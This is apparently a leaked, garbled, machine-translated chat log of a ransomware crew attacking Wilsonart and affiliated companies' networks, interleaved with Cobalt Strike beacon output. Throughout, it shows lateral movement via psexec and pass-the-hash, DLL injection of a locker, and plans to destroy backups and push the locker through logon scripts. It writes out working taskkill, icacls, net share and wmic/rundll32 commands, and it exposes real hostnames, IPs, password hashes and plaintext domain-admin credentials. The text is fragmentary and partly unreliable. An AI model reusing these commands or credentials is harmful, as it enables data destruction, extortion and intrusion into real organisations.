ignored She did not come to connect the Internet With the manager agreed to the morning Computers put Hi 10```.
SCCY-DC.sccy.local.
TS.sccy.local
SCCY-FS.sccy.local.
``````
www.sccy.com
antivirus.sccy.com
autodiscover.sccy.com
host.sccy.com
rd.sccy.com
www.rd.sccy.com
remote.sccy.com
www.remote.sccy.com
server.sccy.com
server2.sccy.com
store.sccy.com
www.store.sccy.com
ts.sccy.com
www.ts.sccy.com

``http://10.0.0.4:5000/webman/login.cgi?enable_syno_token=yes''.
setg Proxies socks4:209.222.101.167:1488
``but they're sly foxes yes, there's been a fortune in it... and there's like a ntds taken down...``
https://connect.globaltranz.com/login?redir=%2Fng
the first 3 are just not available? the first 2 seem to have got encrypted today in the last one where it was allowed to go in and wiped the rest too?
beacon> shell dir \\\dcwas79.Wilsonart.com\D$
[*] Tasked beacon to run: dir \\dcwas79.Wilsonart.com\D$
[+] host called home, sent: 61 bytes
[+] received output:
The network path was not found.
```
```
beacon> shell dir \\dcveeam01.Wilsonart.com\F$
[*] Tasked beacon to run: dir \\dcveeam01.Wilsonart.com\F$
[+] host called home, sent: 63 bytes
[+] received output:
The network path was not found.
```
```
beacon> shell dir \\\bod01-bkp01.eu.Wilsonart.com\F$
[*] Tasked beacon to run: dir \\bod01-bkp01.eu.Wilsonart.com\F$
[+] host called home, sent: 68 bytes
[+] received output:
The network path was not found.
```
 
`nas_signature.polyrey.net` this one was wiped through the web face
 
```
beacon> shell dir \\BBDC03.bushboard.co.uk\C$
[*] Tasked beacon to run: dir \\BBDC03.bushboard.co.uk\C$
[+] host called home, sent: 62 bytes
[+] received output:
The network path was not found.
``That's how the slf.local fell off, they were pulled in.``
```
beacon> shell dir \\192.168.3.8\C$\readme.txt
[*] Tasked beacon to run: dir \\192.168.3.8\C$\readme.txt
[+] received output:
The specified network name is no longer available.
```
```
beacon> shell dir \\192.168.3.7\C$\readme.txt
[*] Tasked beacon to run: dir \\192.168.3.7\C$\readme.txt
[+] host called home, sent: 62 bytes
[+] received output:
The specified network name is no longer available.
and give me a full hell of a lot more info from all domains[ ](https://mediaeveryone.com/group/1-done-wilsonart-com?msg=penupTybFst3QZhiF) that way2-3 files from file servers and backups will be enough then i'm waiting for listings now the exe file on armas was released on the rest of the drives in this domain only dk came from somewhere else? yeah, now even the buck will not let in earlier i came in where there is no buck will not let in `` ``
Share name Type Used as Comment
    -------------------------------------------------------------------------------
    ADMIN$ Disk Remote Admin
    Bushboard Backups Disk
    C$ Disk Default share
    E$ Disk Default share
    F$ Disk Default share
    IPC$ IPC Remote IPC
    iTop-2.6.1-4463 Disk
    log Disk
    SQL_Server Disk
    U$ Disk Default share
    UpdateServicesPackages Disk A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system.  
    VBRCatalog Disk
    vCenterBackups Disk
    WsusContent Disk A network share to be used by Local Publishing to place published content on this WSUS system.                                           
    WSUSTemp Disk A networ
not all of the shares[ ](https://mediaeveryone.com/group/1-done-wilsonart-com?msg=6uBj3ySA2pTDJoM4w) didn't let me in? where did it let me in - erasing bushboard backups didn't touch it so dir \\host\share\* /s > out.txt+ can take backups file structures then specify info about it somewhere not let me in under DA not all domains are alive I couldn't tell you, did the sharing scheme work?i can't tell where it's not - i'm getting to some of the files that have been uploaded, they all crashed out at oncearms now i'm checking[ ](https://mediaeveryone.com/group/1-done-wilsonart-com?msg=6QYAwTYx9t5mDs7aB) stats are up what aboutarms? they say you have 2-3 servers that are not working? 1.done.wilsonart.comok, from the neighboring try not checked, but it is better not to try, I do not know how the locker injected into one pid in two variants in general behaves[ ](https://mediaeveryone.com/group/wilsonart-com?msg=MaZfrEJ9pdfnTstjF) and so not from a separate session can? *trashbackup files are hard to restore and damaged easily enough ... but after rm it's better to dump the garbage anyway free space if you are already switched off to sleep and everything else is done - you can rm too =)so can rm ?)so you can dump the backups any way you want and don't want to get damaged without restoring them, because if they get a decryptor they will in any case restore the workstations and servers in their last state or use -nomutex flag from a "separate" sessionbut for that it is better to slow down the current process of blockingmay try right now by adding the path flag and -size 15 for example
to corrupt 15% of files in the directory where backups are kept theoretically, you can set a locker on backups with -size flag to reduce corruptions percentage for speed reasons- even 10% is not enough- backups are encrypted for a long time- check hosts where sessions are dead after lock process start check and if all ok, go have a rest- so, if everything is started, 20 minutes asleep, have some breakfast and in 20 minutes do control check
re-piping all hosts, see if new hosts have not declared, if the process is running correctly on all where it was started if there is huge data - and it will take a long time to do - delete what has not had time to crypto appear to them all fine, please check the files snapshots latching by hand snapshots in the sphere and did not happen)
the server where snapshots were stored is locked by crypt
is there a rdmi/snapshots deleted/encrypted? virtualization was found - snapshots were taken and flown to a backup on a win-server
nasa was accessed, their disks were primed.
backups were stored on vin servers superficially watching the case, tell me what is it with backups/nas/virtualization wait 20-30 minutes and do a manual check on all servers and armas
about the re-injection got it
the files just didn't show up
```
if a session did not die after the first injection, probably there is a file queue and you should be patient it means a segment delimitation with Cisk as the fv playing the role of re-injection
the files didn't show up so you're trying to ping the host
titty
```
who's that? ciscar? or isis?
Bottom line:

Wilsonart.com.
srv: 125 (3 disks/nixes) / 128
arm: shared disks

uk.Wilsonart.com
srv: 22 / 22
arm: 44 / 44
 
eu.Wilsonart.com
srv: 36 / 36
arm: 2 / 2
 
cn.Wilsonart.com
srv: 1 / 1

WI.RWP.COM.
srv: 27 / 31 (1 was not approached by admins, two did not have 445, 1 was not wind)
arm: unshared

SLF.LOCAL
srv: 8 / 8
arm: 6 / 8 (repping occurred)
 
resopal.lan
srv: 26
arm: all shared

ralpwilson.com
srv: 1 / 1
 
polyrey.net
srv: 52 / 53 (1 was not approached by admins)
arm: 28 masked
 
BUSHBOARD.CO.UK
srv: 10 / 10
arm: 17 mashed up
 
arborite.com
srv: 9 / 9
arm: all armas are shared
``This could have unpredictable effects on file recovery if the flagwot is not written in time.
[*] Manual DLL Inject - @tomcarver_
[+] host called home, sent: 222831 bytes
[+] received output:
Injected.
[*] Manual DLL Inject - @tomcarver_
[+] host called home, sent: 222831 bytes
[+] received output:
Injected.
[*] Manual DLL Inject - @tomcarver_
[+] host called home, sent: 222831 bytes
[+] received output:
Injected.
[*] Manual DLL Inject - @tomcarver_
[+] host called home, sent: 222831 bytes
[+] received output:
Injected.
``This is not the way to do it.
i see on some of the sessions, i'll prepare the status, everything works, then da mount yes run at once on this 2003 no vu some awful there is also e meets in this griddiskonnect incidentally often almost instantaneous and there were only C-drives? no more? well, will have to re-mount) there are many in the domains do not stretch this in the same domain `` ``
Status Local Remote Network

-------------------------------------------------------------------------------
Disconnected L:        \170.7.122.153\c$ Microsoft Windows Network
Disconnected M:        \170.7.25.7\c$ Microsoft Windows Network
Disconnected N:        \170.7.34.75\c$ Microsoft Windows Network
Disconnected O: \170.7.38.21\c$ Microsoft Windows Network
Disconnected P:        \170.7.9.19\c$ Microsoft Windows Network
Disconnected Q:        \170.7.183.5\c$ Microsoft Windows Network
Disconnected R:        \170.7.5.11\c$ Microsoft Windows Network
Disconnected S:        \170.7.24.25\c$ Microsoft Windows Network
Disconnected T:        \170.7.123.166$ Microsoft Windows Network
Disconnected U:        \170.7.76.123$ Microsoft Windows Network
Disconnected V: \170.7.121.129$ Microsoft Windows Network
Disconnected W:        \170.7.183.97\c$ Microsoft Windows Network
Disconnected X:        \170.7.183.84\c$ Microsoft Windows Network
Disconnected Y:        \170.7.123.168$ Microsoft Windows Network
Disconnected Z:        \170.7.123.224$ Microsoft Windows Network
```
:zany_face:what about the others? ``
170.7.20.230:445
170.7.2.30 not 445 here
170.7.110.205.
170.7.44.212:445 (platform: 500 version: 5.2 name: TNTAS03 domain: WI)
then in the dry residue look at those that do not have enough rights to if we miss something - it is not fatal, but the lock should already begin, let die those hosts that are attracted and lured so
Tell me for all the domains what statistics and how many not attracted or not muzzled
172.22.190.10
172.22.190.11
10.40.60.50
``I'm already confused by the name of this nor170.7.2.30 this nor170.7.44.212:445a ping -a gave out this namewi.rwp.comnu the domain name so it means they are in a WI domain of some kind```
TNTAS03.WI.RWP.COM
hqtov02.WI.RWP.COM
``````
Teemo[SCZEVMRDS05]Administrator */8456|2020Dec27 09:55:00> shell net use * \\172.25.168.150\C$
[*] Tasked beacon to run: net use *\\\172.25.168.150\C$
[+] host called home, sent: 60 bytes
[+] received output:
Le mot de passe n'est pas valide pour \\172.25.168.150\C$.

Entrez le nom d'utilisateur de '172.25.168.150':
```
i tried with different tokens, no one is good with this dnshostname. as long as they are domain hosts, they should not be in adc, they are not in adcom, tntas01 / tntas02hqtov01 maybe there```.
hqtov02.rwp.com [170.7.2.30]
tntas03.rwp.com [170.7.44.212]
``Look who the admins are there, I don't know...
they have neighbors with the same hostname that the admins don't pass two or more ``
170.7.20.198
170.7.14.22
170.7.120.225
170.7.20.103
172.25.168.89
``This four do with them[ ](https://mediaeveryone.com/group/wilsonart-com?msg=8qFm4k6XxFM8ZoxQJ) well exactly 170.7.20.230:443
Teemo[SCZEVMRDS05]Administrator */8456|2020Dec27 09:49:56> shell net use *\\172.25.170.69\C$
[*] Tasked beacon to run: net use *\\\172.25.170.69\C$
[+] host called home, sent: 59 bytes
[+] received output:
L'erreur système 53 s'est produite.

Le chemin réseau n'a pas été trouvé.

```
There's no 170.7.110.205 in Tatar at all, it's 445.
170.7.20.230:445
``````
there is no such subnet here as admins, but only in another one in the main domain, the LA did not come through from there
```
have you tried the enterprise? is everything pulled up/administered? or are there any problems as well? i see, how are the others doing? these two do not connect to cmblogin, the first one is not in ad_compact
```
fltov02.rwp.com [170.7.20.230]
hqtas28.wilsonart.com [170.7.110.205]
```
here didn't pass as YES admins, and this subnet is only in another one in the main domain, LA didn't pass from there
```
hqtov02.rwp.com [170.7.2.30]
tntas03.rwp.com [170.7.44.212]
``pth resopal.lan\admig 4654a6461da41310e51da91aaa7011da including local admin to re-check the kredna pack the rest can smb_login the other ones? or just from another point? the rest have pulled up on these while I am going through ``
170.7.20.230 -
170.7.2.30 -
170.7.110.205 -
170.7.44.212 -
```Administrator:500:aad3b435b51404eeaad3b435b51404ee:2caf37093fda2e2d172732487707cd31:::
170.7.5.* for example i would try the server local admin from servers which are in the same subnet how many you have left? maybe under the other will be under this yes no kayfiz under yes no right such things
you just don't have rights to the ones you can't open. [-] could not open \170.7.20.230\c$*:
[-] could not open \170.7.5.75\c$*:
[-] could not open \170.7.2.30\c$*:
[-] could not open \170.7.5.10\c$*:
[-] could not open \170.7.76.123\c$*:
[-] could not open \170.7.5.11\c$*:
[-] could not open \170.7.110.205\$*:
[+] established link to child beacon: 170.7.110.16
[+] established link to child beacon: 170.7.10.204
[+] established link to child beacon: 170.7.41.213
[-] could not open \170.7.44.212.{\c$\*:because it's not finished yet
for these binary binary generated by bind pipes, artifact doesn't work while it doesn't work under swtz, but it's about service creation (only if it's not done) @tl2 don't you just use new artifact?
170.7.41.214 -
170.7.55.114 -
170.7.20.230 -
170.7.5.75 -
170.7.2.30 -
170.7.5.10 -
170.7.76.123 -
170.7.5.11 -
170.7.110.205 -
170.7.110.16 -
170.7.10.204 -
170.7.41.213 -
170.7.44.212 -

``````
beacon> jump psexec 170.7.5.10 smb
[*] Tasked beacon to run windows/beacon_bind_pipe (\.\pipe\msagent_15) on 170.7.5.10 via Service Control Manager (\\170.7.5.10\ADMIN$\56b5cb5.exe)
[+] host called home, sent: 287642 bytes
[-] could not upload file: 5
[-] Could not open service control manager on 170.7.5.10: 5
[-] Could not connect to pipe: 2
which didn't connect, don't make a screenshot, make a list of hosts i had an error with the same host i don't know what to say :-)look at my log 1908 from which pead? everything works...well...
[beacon> jump psexec 170.7.41.214 smb
[*] Tasked beacon to run windows/beacon_bind_pipe (\.\pipe\msagent_15) on 170.7.41.214 via Service Control Manager (\170.7.41.214\ADMIN$\16e208c.exe)
[+] host called home, sent: 287736 bytes
[+] received output:
Started service 16e208c on 170.7.41.214
[+] established link to child beacon: 170.7.41.214
That's what I meant about the disk ball
```
C:/Windows\system32\net1 stop samss /y
C:Windows\system32/net1 stop veeamcatalogsvc /y
C:Windows\system32/net1 stop veeamcloudsvc /y
C:Windows\system32/net1 stop veeamdeploysvc /y
C:Windows\System32/net.exe stop samss /y
C:Windows\System32/net.exe stop veeamcatalogsvc /y
C:Windows\System32/net.exe stop veeamcloudsvc /y
C:Windows\System32/net.exe stop veeamdeploysvc /y
C:³Windows\System32\taskkill.exe /IM sqlbrowser.exe /F
C:Windows\System32\taskkill.exe /IM sqlceip.exe /F
C:{Windows\System32\taskkill.exe /IM sqlservr.exe /F
C:{Windows\System32\taskkill.exe /IM sqlwriter.exe /F
C:{Windows\System32\taskkill.exe /IM veeam.backup.agent.configurations.exe /F
C:\Windows\System32\taskkill.exe /IM veeam.backup.brokerservice.exe /F
C:³Windows\System32\taskkill.exe /IM veeam.backup.catalogdataservice.exe /F
C:³Windows\System32\taskkill.exe /IM veeam.backup.cloudservice.exe /F
C:³Windows\System32\taskkill.exe /IM veeam.backup.externalinfrastructure.dbprovider.exe /F
C:³Windows\System32\taskkill.exe /IM veeam.backup.manager.exe /F
C:³Windows\System32\taskkill.exe /IM veeam.backup.mountservice.exe /F
C:³Windows\System32\taskkill.exe /IM veeam.backup.service.exe /F
C:³Windows\System32\taskkill.exe /IM veeam.backup.uiserver.exe /F
C:Windows\System32\taskkill.exe /IM veeam.backup.wmiserver.exe /F
C:{Windows\System32\taskkill.exe /IM veeamdeploymentsvc.exe /F
C:{Windows\System32\taskkill.exe /IM veeamfilesysvsssvc.exe /F
C:\Windows\System32\taskkill.exe /IM veeam.guest.interaction.proxy.exe /F
C:\Windows\System32\taskkill.exe /IM veeamnfssvc.exe /F
C:³Windows\System32\taskkill.exe /IM veeamtransportsvc.exe /F
C:{Windows\system32\taskmgr.exe /4
C:\Windows\system32\wbem\wmiprvse.exe -Embedding
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

net share c=c: /grant:everyone,full
net share d=d: /grant:everyone,full
net share e=e: /grant:everyone,full
net share f=f: /grant:everyone,full
net share g=g: /grant:everyone,full
net share h=h: /grant:everyone,full
net share i=i: /grant:everyone,full
net share j=j: /grant:everyone,full
net share k=k: /grant:everyone,full
net share l=l: /grant:everyone,full
net share m=m: /grant:everyone,full
net share n=n: /grant:everyone,full
net share o=o: /grant:everyone,full
net share p=p: /grant:everyone,full
net share q=q: /grant:everyone,full
net share r=r: /grant:everyone,full
net share s=s: /grant:everyone,full
net share t=t: /grant:everyone,full
net share u=u: /grant:everyone,full
net share w=w: /grant:everyone,full
net share v=v: /grant:everyone,full
net share x=x: /grant:everyone,full
net share y=y: /grant:everyone,full
net share z=z: /grant:everyone,full



icacls C:\* /grant Everyone:F /T /C /Q
icacls D:\* /grant Everyone:F /T /C /Q
icacls E:\* /grant Everyone:F /T /C /Q
icacls F:\* /grant Everyone:F /T /C /Q
icacls G:\* /grant Everyone:F /T /C /Q
icacls H:\* /grant Everyone:F /T /C /Q
icacls I:\* /grant Everyone:F /T /C /Q
icacls J:\* /grant Everyone:F /T /C /Q
icacls K:\* /grant Everyone:F /T /C /Q
icacls L:\* /grant Everyone:F /T /C /Q
icacls M:\* /grant Everyone:F /T /C /Q
icacls N:\* /grant Everyone:F /T /C /Q
icacls O:\* /grant Everyone:F /T /C /Q
icacls P:\* /grant Everyone:F /T /C /Q
icacls Q:\* /grant Everyone:F /T /C /Q
icacls R:\* /grant Everyone:F /T /C /Q
icacls S:\* /grant Everyone:F /T /C /Q
icacls T:\* /grant Everyone:F /T /C /Q
icacls U:\* /grant Everyone:F /T /C /Q
icacls V:\* /grant Everyone:F /T /C /Q
icacls W:\* /grant Everyone:F /T /C /Q
icacls X:\* /grant Everyone:F /T /C /Q
icacls Y:\* /grant Everyone:F /T /C /Q
icacls Z:\* /grant Everyone:F /T /C /Q

``The error was the same, but the conclusion sailed away,`` the disks were scrambling,`` the servers were dragging,`` the servers were dragging,`` 908.
104.194.10.161:53256
KtdyhCtQUR4qWj0JfZd45Gn7ivsiLJ5sILi
```о
just in time) so what's up? let me see for myself tell me what session yes tokenblin
give me access to the server where you're working with the domain what about it dllkapo https is not jumping on the case so it blames on the sharingvot error on top of what blames? you rubbed aver ... you're not supposed to get an error...well, cmb yes it's a bindpipe where -try the servers that are not pulled by bindpipe all cmb pulled where +that's the picture and the servers are pulled by delku it says when we try to share disks on the armas
Win32 Error: The process cannot access the file because it is being used by another process.


``Snow the skinoon is shitting with an error only through smb through delki and httpsc.wilsonart.com\-admin-bownem 361ab72479515c09284591c50cebfe23 how is it not shitting?
If you already have domain mapped, can we just lock the domains we already have?
```
yes, you can at once@tl2 @tl1 those domains that are already primatted and attracted can we lock immediately ?
cJZw4bgWNBuYAeLXToHzNLYZOqnTS8CJwIe`
    logn: fowlerh@wilsonart.com
    pass: R3f1nn3j2!

    Wilsonart.com\Administrator DA
    {}wallC2013

    Wilsonart.com\roeders DA
    Dell@2020
but i don't have any clean ones((
try paiload to the ipi instead of the domainlit and more than 100k do not limit if the coba has a limit of 100k and a lot of servers come out do not knocka why?
does not knock something somewhere? he supposed to come back if it does not shut down with the ends (it should @tl1 wait(
i don't have @tl1@tl2 answer two clean coba?
beacon> shell ping HQTAS37
[*] Tasked beacon to run: ping HQTAS37
[+] host called home, sent: 43 bytes
[+] received output:
Ping request could not find host HQTAS37. Please check the name and try again.
```
```
beacon> shell ping HQTAS65
[*] Tasked beacon to run: ping HQTAS65
[+] host called home, sent: 43 bytes
[+] received output:
Ping request could not find host HQTAS65. Please check the name and try again.
´´but there is an isolated sabnet or something randomly pinged a little hands those who did not respond to the list from hell, hit the eheskoy, it came out only alive in the same sabnet where the disabled others pinged ok ?
disconnected must be
the other servers are not pinging because they are old/disconnected or there is no route to them?
WI.RWP.COM
srv: 31 / 60
arm: 122 / 515
Go to the root
the root is always better from there for some reason)why not just put it in the root C ?
```
copy \DCWAS01\SYSVOL\Wilsonart.com\scripts\1.exe C:{\windows && C:\windows\1.exe

``Well, the locker does not seem to touch the executable files, in theory it should work)``Tried it, I just do not know if the current build encrypts logon scripts to be honest :smile:to know for surehttp://www://www/web/v78/logon_agent/la_configure_scriptspx#:text=In%20%20theGroup_scripts.websense.com/content/support/library/web/v78/logon_agent/la_configure_scripts.aspx#:~:text=In%20the%20Group%20Policy%20Management,Logon%20in%20the%20right%20pane.&text=In%20the%20Logon%20Properties%20window,Scripts\Logon\%20is%20displayed.and who tried something like this before? to come and finish it themselves so let's make a blank for the rest) not the fact that the domain authorization will fall off so by the time people come to the domain will fuck up. especially on weekends and holidays. it's Christmas they have a logon script, and how? and more additional tasks)
 then add copying and launching the locker to the logon scripts)
and the ox isn't needed
people will come to work, turn on the car
and lock themselves in peace
the date on armatures locks in minutes if not seconds

``Then readiness 10 min)`` and so on? builds dll lists and host lists have prepared themselves commands work in tempav + vindefrule av and start? snp no so well general alg, is to scatter batnik on shary disks from the armas to report by hand finishdana vmik and kopismozhet do rait errors?aha it is possible, but it is long, kapetspravdi threads ... they have a variant with a list of hosts + startup from systems + output and tdmb by the way in general take the same psek from the ms what to psek there? track the total errors?'nj nfr vj;yj ghbnzyenm cthdfrb yfghbvth ``

copy %dll% \\\%1\admin$
wmic /node:%1 process call create "rundll32 c:\windows\%dll% entryPoint"
Right? this gotch throws it in and runs it as a parameter. the batcnik throws it in and runs it[ ](https://mediaeveryone.com/group/wilsonart-com?msg=nsZeWcy8AxyCneT7n) .haven't made a batcnik yet. most likely?) most likely. what do we write in the batcnik? and run what? take an ip from the list, if it pings we call the batch, which takes the ip as a parameter. the batcnik throws it in and runs it. everything in the fucking streams.
```
uk.Wilsonart.com
srv: 1 / 1
```
it's actually this
```
cn.Wilsonart.com
srv: 1 / 1
``in a nutshell the algorithm is like this ``rfr nj nfrsharpsharesng ips list.txt --alive -exec pull.By the way how do you solve the mass spreading of the eche?
WI.RWP.COM
srv: / 60
arm: / 515
 
polyrey.net
srv: 53 / 64
arm: 45 / 340
 
eu.Wilsonart.com
srv: 36 / 43
arm: 2 / 10

resopal.lan
srv: 26 / 27
arm: 11 / 100

uk.Wilsonart.com
srv: 22 / 25
arm: 44 / 157
``These 5 can be drawn from others.

BUSHBOARD.CO.UK
srv: 10 / 17
arm: 26 / 136
 
arborite.com
srv: 9 / 12
arm: 29 / 154

SLF.LOCAL
srv: 8 / 10
arm: 49 / 66

ralpwilson.com
srv: 1 / 1

uk.Wilsonart.com
srv: 1 / 1
``Map the servers unreachable, tasklist cut off the crisis services and while scattering attract other domains then scatter the file that will shasharit disks and stuff on armasperechtalivayut itdasy question) with small or large domain will start?they were not, but I'll walk to be sure on the classic drop snaps if any then skipkey (we sent a broadcast but no one woke up check on the default settings yesvole in biose should be turned on, right?yes you can go there quietly as you turn it off from the main domain in that domain found7 from other domains can only see the dkpod YES of the entrance domain have access thereto from another domain to mask its serverspolozhdeny trust has anything with anything?
WI.RWP.COM
srv: / 60
arm: / 515
``Let's think about merging
 Directory of \BBDC03.bushboard.co.uk\Bushboard Backups\Backup

21/10/2020 21:25 <DIR> .
21/10/2020 21:25 <DIR> .
21/10/2020 21:25 11,334 Backup.vbm
21/10/2020 21:25 357,040,234,496 BackupD2020-10-21T204800_278E.vbk
               2 File(s) 357,040,245,830 bytes
               2 Dir(s) 7,410,316,644,352 bytes free
```
 
```
 Directory of \BBDC03.bushboard.co.uk\Bushboard Backups\Daily

26/12/2020 21:22 <DIR> .
26/12/2020 21:22 <DIR> .
26/12/2020 21:22 277,452 Daily.vbm
26/12/2020 21:19 8,877,858,816 DailyD2020-12-22T210026_0A86.vrb
26/12/2020 21:20 5,325,545,472 DailyD2020-12-23T210030_4C1A.vrb
26/12/2020 21:22 3,240,009,728 DailyD2020-12-24T210037_9249.vrb
26/12/2020 21:22 2,230,308,864 DailyD2020-12-25T210022_FD90.vrb
26/12/2020 21:22 989,772,115,968 DailyD2020-12-26T210030_B7DE.vbk
               6 File(s) 1,009,446,116,300 bytes
               2 Dir(s) 7,410,316,644,352 bytes free
```
 
```
 Directory of \BBDC03.bushboard.co.uk\Bushboard Backups\Full Backup

10/10/2020 21:35 <DIR> .
10/10/2020 21:35 <DIR> .
10/10/2020 21:35 1,952 Full Backup.vbm
               1 File(s) 1,952 bytes
               2 Dir(s) 7,410,316,644,352 bytes free
```
 
```
 Directory of \BBDC03.bushboard.co.uk\Bushboard Backups\VCenter

26/12/2020 20:05 <DIR> .
26/12/2020 20:05 <DIR> .
26/12/2020 20:05 366,006 VCenter.vbm
12/12/2020 20:04:21,046,738,944 VCenterD2020-12-12T200342_5ADE.vbk
13/12/2020 20:03 709,451,776 VCenterD2020-12-13T200034_237F.vib
14/12/2020 20:03 740,597,760 VCenterD2020-12-14T200031_7C1E.vib
15/12/2020 20:03 716,304,384 VCenterD2020-12-15T200029_B706.vib
16/12/2020 20:03 731,889,664 VCenterD2020-12-16T200028_8B8F.vib
17/12/2020 20:03 786,378,752 VCenterD2020-12-17T200033_E75E.vib
18/12/2020 20:03 719,417,344 VCenterD2020-12-18T200017_4E4C.vib
19/12/2020 20:04 22,938,509,312 VCenterD2020-12-19T200341_5DF3.vbk
20/12/2020 20:03 777,809,920 VCenterD2020-12-20T200031_A2E8.vib
21/12/2020 20:03 726,798,336 VCenterD2020-12-21T200035_AF2A.vib
22/12/2020 20:03 764,702,720 VCenterD2020-12-22T200039_2DFC.vib
23/12/2020 20:03 750,419,968 VCenterD2020-12-23T200036_9458.vib
24/12/2020 20:03 828,559,360 VCenterD2020-12-24T200021_2518.vib
25/12/2020 20:03 777,314,304 VCenterD2020-12-25T200028_4E96.vib
26/12/2020 20:05 24,845,225,984 VCenterD2020-12-26T200359_13B5.vbk
              16 File(s) 77,860,484,534 bytes
               2 Dir(s) 7,410,316,644,352 bytes free
``I need to see the files in these folders
21/10/2020 21:25 <DIR> Backup
26/12/2020 21:22 <DIR> Daily
10/10/2020 21:35 <DIR> Full Backup
26/12/2020 20:05 <DIR> VCenter
``````
 Directory of \BBDC03.bushboard.co.uk\ADMIN$

23/12/2020 14:04 <DIR> .
23/12/2020 14:04 <DIR> .
16/07/2016 13:23 <DIR> ADFS
07/02/2019 15:13 <DIR> appcompat
13/10/2020 15:16 <DIR> application compatibility scripts
28/09/2020 20:12 <DIR> AppPatch
22/12/2020 14:46 <DIR> AppReadiness
03/05/2019 07:17 <DIR> bcastdvr
28/04/2018 05:47 63,488 bfsvc.exe
23/12/2020 09:49 16,588,854 BGInfo.bmp
16/07/2016 13:23 <DIR> Boot
16/07/2016 13:23 <DIR> Branding
23/12/2020 13:45 <DIR> CbsTemp
03/05/2019 07:17 PM <DIR> Cluster
03/05/2019 07:16 <DIR> CSC
16/07/2016 13:23 <DIR> Cursors
13/08/2019 16:16 436,524 dd_vcredistMSI13B4.txt
23/12/2020 14:04 423,110 dd_vcredistMSI2C36.txt
29/10/2020 16:36 582,720 dd_vcredistMSI576D.txt
29/10/2020 16:45 582,726 dd_vcredistMSI5E40.txt
13/08/2019 16:16:13,680 dd_vcredistUI13B4.txt
23/12/2020 14:04 30,450 dd_vcredistUI2C36.txt
29/10/2020 16:36 46,300 dd_vcredistUI576D.txt
29/10/2020 16:45 46,300 dd_vcredistUI5E40.txt
20/11/2016 18:17 <DIR> de-DE
02/08/2019 09:39 <DIR> debug
21/05/2019 04:02:02 232,960 DfsrAdmin.exe
20/06/2019 10:56 1,315 DfsrAdmin.exe.config
16/07/2016 13:23 <DIR> diagnostics
20/11/2016 18:17 <DIR> digitalLocker
16/07/2016 13:23 <DIR> drivers
06/12/2018 16:27 4,056 DtcInstall.log
06/12/2018 17:21 <DIR> en-GB
01/03/2019 13:30 <DIR> en-US
06/08/2020 22:54 4,674,784 explorer.exe
16/07/2016 13:23 <DIR> GameBarPresenceWriter
16/07/2016 13:23 <DIR> Globalization
20/11/2016 18:17 <DIR> Help
03/06/2017 08:52 975,872 HelpPane.exe
16/07/2016 13:18 18,432 hh.exe
01/03/2019 14:19:94,567 iis.log
03/05/2019 07:17 <DIR> IME
28/09/2020 20:12 <DIR> ImmersiveControlPanel
22/12/2020 14:38 <DIR> INF
16/07/2016 13:23 <DIR> InfusedApps
16/07/2016 13:23 <DIR> InputMethod
16/07/2016 13:23 <DIR> L2Schemas
18/07/2019 13:35 <DIR> LiveKernelReports
14/02/2019 17:31 <DIR> Logs
20/11/2016 09:52 1,340 lsasetup.log
29/05/2019 12:24 AM <DIR> LSDeployment
16/07/2016 13:18 43,131 mib.bin
26/12/2020 09:51 <DIR> Microsoft.NET
16/07/2016 13:23 <DIR> Migration
03/05/2019 07:17 <DIR> MiracastView
16/07/2016 13:23 <DIR> ModemLogs
16/07/2016 13:19 243,200 notepad.exe
19/07/2019 10:05 467,492 ntbtlog.txt
13/08/2019 08:54 <DIR> OCR
10/11/2020 15:39:405 ODBC.INI
02/08/2019 16:01 469 ODBCINST.INI
16/07/2016 13:23 <DIR> Offline Web Pages
06/12/2018 16:27 <DIR> Panther
16/07/2016 13:23 <DIR> Performance
09/12/2020 09:07 2,614,310 PFRO.log
16/07/2016 13:23 <DIR> PLA
28/09/2020 20:12 <DIR> PolicyDefinitions
09/12/2020 09:08 <DIR> prefetch
03/05/2019 07:17 <DIR> PrintDialog
16/07/2016 13:23 <DIR> Provisioning
13/10/2020 15:15 <DIR> rdcbDb
04/03/2017 06:18 320,512 regedit.exe
01/03/2019 14:15 AM <DIR> Registration
13/10/2020 15:15 <DIR> RemotePackages
11/11/2020 09:08 AM <DIR> rescache
16/07/2016 13:23 <DIR> Resources
16/07/2016 13:23 <DIR> SchCache
16/07/2016 13:23 <DIR> schemas
16/07/2016 13:23 <DIR> security
16/07/2016 13:19 28,777 ServerStandard.xml
20/11/2016 09:52 <DIR> serviceProfiles
28/09/2020 20:12 <DIR> servicing
16/07/2016 13:25 <DIR> Setup
22/12/2020 14:38 12,560 setupact.log
20/11/2016 18:53 0 setuperr.log
13/02/2020 14:52 <DIR> ShellExperiences
16/07/2016 13:23 <DIR> SKB
06/12/2018 21:44 <DIR> SoftwareDistribution
16/07/2016 13:23 <DIR> Speech
16/07/2016 13:23 <DIR> Speech_OneCore
08/07/2020 06:58 131,584 splwow64.exe
16/07/2016 13:23 <DIR> System
16/07/2016 13:219 system.ini
22/12/2020 14:38 <DIR> System32
16/07/2016 13:23 <DIR> SystemApps
16/07/2016 13:23 <DIR> SystemResources
23/12/2020 14:03 <DIR> SysWOW64
23/12/2020 10:58 PM <DIR> TAPI
20/11/2016 18:53 <DIR> Tasks
27/12/2020 02:59 <DIR> Temp
16/07/2016 13:23 <DIR> tracing
16/07/2016 13:23 <DIR> twain_32
16/07/2016 13:20 66,560 twain_32.dll
06/12/2018 17:12 <DIR> Veeam
16/07/2016 13:23 <DIR> Vss
13/10/2020 15:16 <DIR> Web
02/08/2019 14:30 <DIR> WID
16/07/2016 13:21 92 win.ini
27/12/2020 00:20 275 WindowsUpdate.log
16/07/2016 13:19 10:240 winhlp32.exe
23/12/2020 14:04 <DIR> WinSxS
16/07/2016 13:18 316,640 WMSysPr9.prx
16/07/2016 13:18 11,264 write.exe
              36 File(s) 29,085,208 bytes
              77 Dir(s) 1,017,358,946,304 bytes free
```
 
```
 Directory of \BBDC03.bushboard.co.uk\Bushboard Backups

26/12/2020 05:13 <DIR> .
26/12/2020 05:13 <DIR> .
21/10/2020 21:25 <DIR> Backup
26/12/2020 21:22 <DIR> Daily
10/10/2020 21:35 <DIR> Full Backup
21/10/2020 11:52 <DIR> Test
21/10/2020 11:43 PM <DIR> Test Backup
26/12/2020 20:05 <DIR> VCenter
               0 File(s) 0 bytes
               8 Dir(s) 7,410,316,644,352 bytes free
````SIDOUFHGS*DYIUHFDIGYSDUH*:GUILk
dNSHostName: BBDC03.bushboard.co.uk
    Share name Type Used as Comment
    -------------------------------------------------------------------------------
    ADMIN$ Disk Remote Admin
